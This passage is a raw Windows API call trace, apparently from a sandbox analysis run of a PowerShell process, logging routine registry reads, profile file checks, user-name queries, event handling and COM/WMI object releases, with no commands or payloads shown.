Type=0x20000, __alignment2=0x0)) returned 0x30 [0080.915] VirtualQuery (in: lpAddress=0xcaf70, lpBuffer=0xcbe30, dwLength=0x30 | out: lpBuffer=0xcbe30*(BaseAddress=0xca000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0080.915] VirtualQuery (in: lpAddress=0xcaf70, lpBuffer=0xcbe30, dwLength=0x30 | out: lpBuffer=0xcbe30*(BaseAddress=0xca000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0080.917] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd578 | out: phkResult=0xcd578*=0x3b8) returned 0x0 [0080.917] RegQueryValueExW (in: hKey=0x3b8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd4fc, lpData=0x0, lpcbData=0xcd4f8*=0x0 | out: lpType=0xcd4fc*=0x1, lpData=0x0, lpcbData=0xcd4f8*=0x56) returned 0x0 [0080.917] CoTaskMemAlloc (cb=0x5a) returned 0x1b90bb50 [0080.917] RegQueryValueExW (in: hKey=0x3b8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd4cc, lpData=0x1b90bb50, lpcbData=0xcd4c8*=0x56 | out: lpType=0xcd4cc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd4c8*=0x56) returned 0x0 [0080.917] CoTaskMemFree (pv=0x1b90bb50) [0080.917] RegCloseKey (hKey=0x3b8) returned 0x0 [0080.917] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd578 | out: phkResult=0xcd578*=0x3b8) returned 0x0 [0080.917] RegQueryValueExW (in: hKey=0x3b8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd4fc, lpData=0x0, lpcbData=0xcd4f8*=0x0 | out: lpType=0xcd4fc*=0x1, lpData=0x0, lpcbData=0xcd4f8*=0x56) returned 0x0 [0080.917] CoTaskMemAlloc (cb=0x5a) returned 0x1b90bb50 [0080.917] RegQueryValueExW (in: hKey=0x3b8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd4cc, lpData=0x1b90bb50, lpcbData=0xcd4c8*=0x56 | out: lpType=0xcd4cc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd4c8*=0x56) returned 0x0 [0080.917] CoTaskMemFree (pv=0x1b90bb50) [0080.918] RegCloseKey (hKey=0x3b8) returned 0x0 [0080.918] CoTaskMemAlloc (cb=0x20c) returned 0x1b8e1ba0 [0080.918] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b8e1ba0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0 [0080.918] CoTaskMemFree (pv=0x1b8e1ba0) [0080.918] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0xcd130, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27 [0080.918] CoTaskMemAlloc (cb=0x20c) returned 0x1b8e1ba0 [0080.919] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b8e1ba0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0 [0080.919] CoTaskMemFree (pv=0x1b8e1ba0) [0080.919] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0xcd130, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27 [0080.921] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0xcd2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36 [0080.921] SetErrorMode (uMode=0x1) returned 0x1 [0080.922] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xcd4e0 | out: lpFileInformation=0xcd4e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0080.922] SetErrorMode (uMode=0x1) returned 0x1 [0080.922] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0xcd2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b [0080.922] SetErrorMode (uMode=0x1) returned 0x1 [0080.922] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xcd4e0 | out: lpFileInformation=0xcd4e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0080.922] SetErrorMode (uMode=0x1) returned 0x1 [0080.922] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0xcd2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45 [0080.922] SetErrorMode (uMode=0x1) returned 0x1 [0080.922] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xcd4e0 | out: lpFileInformation=0xcd4e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0080.923] SetErrorMode (uMode=0x1) returned 0x1 [0080.923] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0xcd2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a [0080.923] SetErrorMode (uMode=0x1) returned 0x1 [0080.923] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xcd4e0 | out: lpFileInformation=0xcd4e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0080.923] SetErrorMode (uMode=0x1) returned 0x1 [0080.926] CoTaskMemAlloc (cb=0x104) returned 0x1ef9f0 [0080.926] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef9f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0080.926] CoTaskMemFree (pv=0x1ef9f0) [0080.927] CoTaskMemAlloc (cb=0x104) returned 0x1ef9f0 [0080.927] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef9f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0080.927] CoTaskMemFree (pv=0x1ef9f0) [0080.929] CoTaskMemAlloc (cb=0x104) returned 0x1ef9f0 [0080.929] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef9f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0080.930] CoTaskMemFree (pv=0x1ef9f0) [0080.932] CoTaskMemAlloc (cb=0x104) returned 0x1ef9f0 [0080.932] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef9f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0080.932] CoTaskMemFree (pv=0x1ef9f0) [0080.938] CoTaskMemAlloc (cb=0x104) returned 0x1ef9f0 [0080.938] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef9f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0080.939] CoTaskMemFree (pv=0x1ef9f0) [0080.940] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3b8 [0080.940] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x35c [0080.940] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x384 [0080.941] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x388 [0080.941] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x38c [0080.941] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x390 [0080.941] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x394 [0080.941] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x398 [0080.941] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x39c [0080.941] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3bc [0080.941] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x380 [0080.941] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3a4 [0080.943] CoTaskMemAlloc (cb=0x104) returned 0x1ef9f0 [0080.943] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef9f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0080.944] CoTaskMemFree (pv=0x1ef9f0) [0080.946] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0080.947] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0xcd6c0 | out: lpMode=0xcd6c0) returned 1 [0080.948] CoTaskMemAlloc (cb=0x104) returned 0x1ef9f0 [0080.949] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef9f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0080.949] CoTaskMemFree (pv=0x1ef9f0) [0080.952] SetEvent (hEvent=0x388) returned 1 [0080.953] SetEvent (hEvent=0x3b8) returned 1 [0080.953] SetEvent (hEvent=0x35c) returned 1 [0080.953] SetEvent (hEvent=0x384) returned 1 [0080.953] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3a8 [0080.955] CoTaskMemAlloc (cb=0x104) returned 0x1ef9f0 [0080.955] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef9f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0080.955] CoTaskMemFree (pv=0x1ef9f0) [0080.956] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd418 | out: phkResult=0xcd418*=0x310) returned 0x0 [0080.956] RegQueryValueExW (in: hKey=0x310, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0xcd39c, lpData=0x0, lpcbData=0xcd398*=0x0 | out: lpType=0xcd39c*=0x0, lpData=0x0, lpcbData=0xcd398*=0x0) returned 0x2 [0148.021] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x340 [0148.021] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x344 [0148.021] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x348 [0148.021] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3d4 [0148.021] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x484 [0148.021] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x34c [0148.021] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x45c [0148.021] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x46c [0148.022] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x1cc [0148.022] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x1d4 [0148.022] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1d0 [0148.022] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3e0 [0148.022] SetEvent (hEvent=0x3d4) returned 1 [0148.022] SetEvent (hEvent=0x340) returned 1 [0148.022] SetEvent (hEvent=0x344) returned 1 [0148.022] SetEvent (hEvent=0x348) returned 1 [0148.022] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3e4 [0148.023] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd4a8 | out: phkResult=0xcd4a8*=0x44c) returned 0x0 [0148.023] RegQueryValueExW (in: hKey=0x44c, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0xcd42c, lpData=0x0, lpcbData=0xcd428*=0x0 | out: lpType=0xcd42c*=0x0, lpData=0x0, lpcbData=0xcd428*=0x0) returned 0x2 [0148.070] SetEvent (hEvent=0x484) returned 1 [0148.070] SetEvent (hEvent=0x34c) returned 1 [0148.070] SetEvent (hEvent=0x45c) returned 1 [0148.093] CoTaskMemAlloc (cb=0x104) returned 0x1eff40 [0148.093] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1eff40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0148.093] CoTaskMemFree (pv=0x1eff40) [0148.099] SetEvent (hEvent=0x328) returned 1 [0148.102] CoTaskMemAlloc (cb=0x804) returned 0x1b92d6a0 [0148.102] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b92d6a0, nSize=0xcd548 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd548) returned 0x1 [0148.103] CoTaskMemFree (pv=0x1b92d6a0) [0148.103] CoTaskMemAlloc (cb=0x204) returned 0x1b8f5340 [0148.103] GetUserNameW (in: lpBuffer=0x1b8f5340, pcbBuffer=0xcd588 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd588) returned 1 [0148.103] CoTaskMemFree (pv=0x1b8f5340) [0148.106] ReportEventW (hEventLog=0x1b9e0008, wType=0x4, wCategory=0x4, dwEventID=0x193, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x300db90*="Stopped", lpRawData=0x300d920) returned 1 [0148.110] SetConsoleCtrlHandler (HandlerRoutine=0x0, Add=0) returned 1 [0148.114] CoGetContextToken (in: pToken=0xcf110 | out: pToken=0xcf110) returned 0x0 [0148.114] IUnknown:QueryInterface (in: This=0x142480, riid=0x7fef2d6d270*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xcf168 | out: ppvObject=0xcf168*=0x142498) returned 0x0 [0148.114] IComThreadingInfo:GetCurrentThreadType (in: This=0x142498, pThreadType=0xcf260 | out: pThreadType=0xcf260*=0) returned 0x0 [0148.114] IUnknown:Release (This=0x142498) returned 0x1 [0148.116] CoGetContextToken (in: pToken=0xcece0 | out: pToken=0xcece0) returned 0x0 [0148.116] IUnknown:QueryInterface (in: This=0x142480, riid=0x7fef2d6d270*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xced38 | out: ppvObject=0xced38*=0x142498) returned 0x0 [0148.117] IComThreadingInfo:GetCurrentThreadType (in: This=0x142498, pThreadType=0xcedd0 | out: pThreadType=0xcedd0*=0) returned 0x0 [0148.117] IUnknown:Release (This=0x142498) returned 0x1 [0148.121] CoGetContextToken (in: pToken=0xcece0 | out: pToken=0xcece0) returned 0x0 [0148.121] IUnknown:QueryInterface (in: This=0x142480, riid=0x7fef2d6d270*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xced38 | out: ppvObject=0xced38*=0x142498) returned 0x0 [0148.121] IComThreadingInfo:GetCurrentThreadType (in: This=0x142498, pThreadType=0xcedd0 | out: pThreadType=0xcedd0*=0) returned 0x0 [0148.121] IUnknown:Release (This=0x142498) returned 0x1 [0148.134] CoGetContextToken (in: pToken=0xcece0 | out: pToken=0xcece0) returned 0x0 [0148.134] IUnknown:QueryInterface (in: This=0x142480, riid=0x7fef2d6d270*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xced38 | out: ppvObject=0xced38*=0x142498) returned 0x0 [0148.134] IComThreadingInfo:GetCurrentThreadType (in: This=0x142498, pThreadType=0xcedd0 | out: pThreadType=0xcedd0*=0) returned 0x0 [0148.134] IUnknown:Release (This=0x142498) returned 0x1 [0148.205] CoGetContextToken (in: pToken=0xcecd0 | out: pToken=0xcecd0) returned 0x0 [0148.205] IUnknown:QueryInterface (in: This=0x142480, riid=0x7fef2d6d270*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xced28 | out: ppvObject=0xced28*=0x142498) returned 0x0 [0148.206] IComThreadingInfo:GetCurrentThreadType (in: This=0x142498, pThreadType=0xcedc0 | out: pThreadType=0xcedc0*=0) returned 0x0 [0148.206] IUnknown:Release (This=0x142498) returned 0x1 [0148.214] CoUninitialize () Thread: id = 4 os_tid = 0x48c Thread: id = 5 os_tid = 0x568 Thread: id = 6 os_tid = 0x6a4 Thread: id = 7 os_tid = 0x20c Thread: id = 8 os_tid = 0x5ac [0073.668] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0078.009] RegCloseKey (hKey=0x308) returned 0x0 [0078.009] LocalFree (hMem=0x16aa30) returned 0x0 [0078.009] RegCloseKey (hKey=0x334) returned 0x0 [0078.010] LocalFree (hMem=0x16aa60) returned 0x0 [0078.010] CloseHandle (hObject=0x324) returned 1 [0078.010] CloseHandle (hObject=0x13) returned 1 [0078.011] CloseHandle (hObject=0xf) returned 1 [0078.011] RegCloseKey (hKey=0x310) returned 0x0 [0078.011] RegCloseKey (hKey=0x30c) returned 0x0 [0079.621] RegCloseKey (hKey=0x3b4) returned 0x0 [0079.621] RegCloseKey (hKey=0x37c) returned 0x0 [0079.621] RegCloseKey (hKey=0x378) returned 0x0 [0079.621] RegCloseKey (hKey=0x374) returned 0x0 [0079.622] RegCloseKey (hKey=0x370) returned 0x0 [0079.622] RegCloseKey (hKey=0x36c) returned 0x0 [0079.622] RegCloseKey (hKey=0x368) returned 0x0 [0079.623] RegCloseKey (hKey=0x364) returned 0x0 [0079.623] RegCloseKey (hKey=0x360) returned 0x0 [0079.623] RegCloseKey (hKey=0x3b0) returned 0x0 [0079.624] RegCloseKey (hKey=0x350) returned 0x0 [0079.624] RegCloseKey (hKey=0x34c) returned 0x0 [0079.624] RegCloseKey (hKey=0x348) returned 0x0 [0079.625] RegCloseKey (hKey=0x344) returned 0x0 [0079.625] RegCloseKey (hKey=0x340) returned 0x0 [0079.625] RegCloseKey (hKey=0x33c) returned 0x0 [0079.625] RegCloseKey (hKey=0x338) returned 0x0 [0079.626] RegCloseKey (hKey=0x308) returned 0x0 [0079.626] RegCloseKey (hKey=0x3ac) returned 0x0 [0079.626] RegCloseKey (hKey=0x324) returned 0x0 [0079.626] RegCloseKey (hKey=0x310) returned 0x0 [0079.627] RegCloseKey (hKey=0x3a8) returned 0x0 [0079.627] RegCloseKey (hKey=0x3a4) returned 0x0 [0079.627] RegCloseKey (hKey=0x380) returned 0x0 [0079.628] RegCloseKey (hKey=0x3bc) returned 0x0 [0079.628] RegCloseKey (hKey=0x39c) returned 0x0 [0079.628] RegCloseKey (hKey=0x398) returned 0x0 [0079.629] RegCloseKey (hKey=0x394) returned 0x0 [0079.629] RegCloseKey (hKey=0x390) returned 0x0 [0079.629] RegCloseKey (hKey=0x38c) returned 0x0 [0079.630] RegCloseKey (hKey=0x388) returned 0x0 [0079.630] RegCloseKey (hKey=0x384) returned 0x0 [0079.630] RegCloseKey (hKey=0x35c) returned 0x0 [0079.630] RegCloseKey (hKey=0x3b8) returned 0x0 [0079.631] RegCloseKey (hKey=0x30c) returned 0x0 [0082.128] RegCloseKey (hKey=0x310) returned 0x0 [0145.897] CoGetContextToken (in: pToken=0x1b5ef3b0 | out: pToken=0x1b5ef3b0) returned 0x0 [0145.897] CoGetContextToken (in: pToken=0x1b5ef2d0 | out: pToken=0x1b5ef2d0) returned 0x0 [0145.897] WbemLocator:IUnknown:Release (This=0x1be416b0) returned 0x0 [0145.897] CoGetContextToken (in: pToken=0x1b5ef2d0 | out: pToken=0x1b5ef2d0) returned 0x0 [0145.897] IUnknown:Release (This=0x1be44830) returned 0x1 [0145.897] CoGetContextToken (in: pToken=0x1b5ef2d0 | out: pToken=0x1b5ef2d0) returned 0x0 [0145.897] WbemStatusCodeText:IUnknown:Release (This=0x1be417e0) returned 0x1 [0145.897] WbemStatusCodeText:IUnknown:Release (This=0x1be417e0) returned 0x0 [0145.898] CoGetContextToken (in: pToken=0x1b5ef2d0 | out: pToken=0x1b5ef2d0) returned 0x0 [0145.898] WbemDefPath:IUnknown:Release (This=0x1be46dc0) returned 0x1 [0145.898] WbemDefPath:IUnknown:Release (This=0x1be46dc0) returned 0x0 [0145.898] CoGetContextToken (in: pToken=0x1b5ef2d0 | out: pToken=0x1b5ef2d0) returned 0x0 [0145.898] WbemDefPath:IUnknown:Release (This=0x1be46ec0) returned 0x1 [0145.898] WbemDefPath:IUnknown:Release (This=0x1be46ec0) returned 0x0 [0145.898] CoGetContextToken (in: pToken=0x1b5ef2d0 | out: pToken=0x1b5ef2d0) returned 0x0 [0145.899] WbemDefPath:IUnknown:Release (This=0x1be44ae0) returned 0x1 [0145.899] WbemDefPath:IUnknown:Release (This=0x1be44ae0) returned 0x0 [0145.899] CoGetContextToken (in: pToken=0x1b5ef2d0 | out: pToken=0x1b5ef2d0) returned 0x0 [0145.899] WbemDefPath:IUnknown:Release (This=0x1be44ed0) returned 0x1 [0145.899] WbemDefPath:IUnknown:Release (This=0x1be44ed0) returned 0x0 [0145.900] CoGetContextToken (in: pToken=0x1b5ef2d0 | out: pToken=0x1b5ef2d0) returned 0x0 [0145.900] WbemDefPath:IUnknown:Release (This=0x1be44fd0) returned 0x1 [0145.900] WbemDefPath:IUnknown:Release (This=0x1be44fd0) returned 0x0 [0145.900] CoGetContextToken (in: pToken=0x1b5ef2d0 | out: pToken=0x1b5ef2d0) returned 0x0 [0145.900] WbemDefPath:IUnknown:Release (This=0x1be450d0) returned 0x1 [0145.901] WbemDefPath:IUnknown:Release (This=0x1be450d0) returned 0x0 [0145.901] CoGetContextToken (in: pToken=0x1b5ef2d0 | out: pToken=0x1b5ef2d0) returned 0x0 [0145.901] WbemDefPath:IUnknown:Release (This=0x1be453a0) returned 0x1 [0145.901] WbemDefPath:IUnknown:Release (This=0x1be453a0) returned 0x0 [0145.902] CoGetContextToken (in: pToken=0x1b5ef2d0 | out: pToken=0x1b5ef2d0) returned 0x0 [0145.902] WbemDefPath:IUnknown:Release (This=0x1be49030) returned 0x1 [0145.902] WbemDefPath:IUnknown:Release (This=0x1be49030) returned 0x0 [0145.902] CoGetContextToken (in: pToken=0x1b5ef2d0 | out: pToken=0x1b5ef2d0) returned 0x0 [0145.902] WbemDefPath:IUnknown:Release (This=0x1be490f0) returned 0x1 [0145.902] WbemDefPath:IUnknown:Release (This=0x1be490f0) returned 0x0 [0145.902] CoGetContextToken (in: pToken=0x1b5ef2d0 | out: pToken=0x1b5ef2d0) returned 0x0 [0145.902] WbemDefPath:IUnknown:Release (This=0x1be491b0) returned 0x1 [0145.903] WbemDefPath:IUnknown:Release (This=0x1be491b0) returned 0x0 [0145.903] CoGetContextToken (in: pToken=0x1b5ef2d0 | out: pToken=0x1b5ef2d0) returned 0x0 [0145.903] WbemStatusCodeText:IUnknown:Release (This=0x1be41d60) returned 0x1 [0145.903] WbemStatusCodeText:IUnknown:Release (This=0x1be41d60) returned 0x0 [0145.903] CoGetContextToken (in: pToken=0x1b5ef2d0 | out: pToken=0x1b5ef2d0) returned 0x0 [0145.903] IUnknown:Release (This=0x1be50d50) returned 0x1 [0145.904] CoGetContextToken (in: pToken=0x1b5ef2d0 | out: pToken=0x1b5ef2d0) returned 0x0 [0145.904] IUnknown:Release (This=0x1be514d0) returned 0x1 [0145.904] CoGetContextToken (in: pToken=0x1b5ef2d0 | out: pToken=0x1b5ef2d0) returned 0x0 [0145.904] IUnknown:Release (This=0x1be52450) returned 0x1 [0145.904] CoGetContextToken (in: pToken=0x1b5ef2d0 | out: pToken=0x1b5ef2d0) returned 0x0 [0145.904] IUnknown:Release (This=0x1be54ef0) returned 0x1 [0145.904] CoGetContextToken (in: pToken=0x1b5ef2d0 | out: pToken=0x1b5ef2d0) returned 0x0 [0145.904] IUnknown:Release (This=0x1be55590) returned 0x1 [0145.905] CoGetContextToken (in: pToken=0x1b5ef2d0 | out: pToken=0x1b5ef2d0) returned 0x0 [0145.905] IUnknown:Release (This=0x1be55c30) returned 0x1 [0145.905] CoGetContextToken (in: pToken=0x1b5ef2d0 | out: pToken=0x1b5ef2d0) returned 0x0 [0145.905] IUnknown:Release (This=0x1be562d0) returned 0x1 [0145.905] CoGetContextToken (in: pToken=0x1b5ef2d0 | out: pToken=0x1b5ef2d0) returned 0x0 [0145.905] IUnknown:Release (This=0x1be56970) returned 0x1 [0145.905] CoGetContextToken (in: pToken=0x1b5ef2d0 | out: pToken=0x1b5ef2d0) returned 0x0 [0145.905] IUnknown:Release (This=0x1be57010) returned 0x1 [0145.906] CoGetContextToken (in: pToken=0x1b5ef2d0 | out: pToken=0x1b5ef2d0) returned 0x0 [0145.906] IUnknown:Release (This=0x1be576c0) returned 0x1 [0145.906] CoGetContextToken (in: pToken=0x1b5ef2d0 | out: pToken=0x1b5ef2d0) returned 0x0 [0145.906] IUnknown:Release (This=0x1be57d70) returned 0x1 [0145.906] CoGetContextToken (in: pToken=0x1b5ef2d0 | out: pToken=0x1b5ef2d0) returned 0x0 [0145.906] IUnknown:Release (This=0x1be58420) returned 0x1 [0145.906] CoGetContextToken (in: pToken=0x1b5ef2d0 | out: pToken=0x1b5ef2d0) returned 0x0 [0145.906] IUnknown:Release (This=0x1be59a70) returned 0x1 [0145.907] CoGetContextToken (in: pToken=0x1b5ef2d0 | out: pToken=0x1b5ef2d0) returned 